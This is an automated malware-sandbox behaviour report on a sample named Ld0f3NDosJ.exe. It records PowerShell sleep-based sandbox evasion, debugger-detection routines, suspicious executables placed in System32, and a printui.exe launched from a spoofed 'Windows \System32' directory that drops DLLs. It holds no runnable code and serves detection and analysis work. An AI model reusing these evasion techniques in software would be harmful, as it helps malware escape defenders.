Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6899Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2891Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8096Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1402Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7392Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1990Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3679
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7309
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3814
Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_53-123038
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 2.2 %
Source: C:\Windows\System32\console_zero.exeAPI coverage: 1.7 %
Source: C:\Windows\System32\crypti.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\crypti.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824Thread sleep count: 6899 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep count: 2891 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4632Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\timeout.exe TID: 1224Thread sleep count: 82 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep count: 8096 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep count: 1402 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\timeout.exe TID: 4876Thread sleep count: 79 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 7392 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 1990 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4148Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep count: 6970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep count: 2671 > 30
Source: C:\Windows\System32\timeout.exe TID: 5956Thread sleep count: 89 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884Thread sleep count: 7385 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep count: 2132 > 30
Source: C:\Windows\System32\svchost.exe TID: 1524Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1524Thread sleep time: -28800000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 5951 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 3679 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 352Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 4328Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 2820Thread sleep count: 90 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236Thread sleep count: 7309 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236Thread sleep count: 2325 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 2128Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep count: 5854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep count: 3814 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeCode function: 53_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h53_2_64946F50
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58E3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,3_2_00007FF646E58E3C
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58CF8 FindClose,FindFirstFileExW,GetLastError,3_2_00007FF646E58CF8
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6D270 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF646E6D270
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C70144 FindClose,FindFirstFileExW,GetLastError,59_2_00007FF6F8C70144
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C701B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,59_2_00007FF6F8C701B8
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C83764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,59_2_00007FF6F8C83764
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,84_2_00007FF6D356D568
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,87_2_00007FF6EA96D568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-18529
Source: C:\Windows\System32\console_zero.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B800 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF646E5B800
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BB470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,53_2_00007FFDA55BB470
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E71350 GetProcessHeap,3_2_00007FF646E71350
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B800 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF646E5B800
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B440 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF646E5B440
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B9E0 SetUnhandledExceptionFilter,3_2_00007FF646E5B9E0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6213C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF646E6213C
Source: C:\Windows \System32\printui.exeCode function: 40_2_00007FF68C621880 SetUnhandledExceptionFilter,40_2_00007FF68C621880
Source: C:\Windows \System32\printui.exeCode function: 40_2_00007FF68C621B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00007FF68C621B5C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_64947650
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,53_2_6828C940
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942D9508 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFD942D9508
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942CB3B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFD942CB3B0
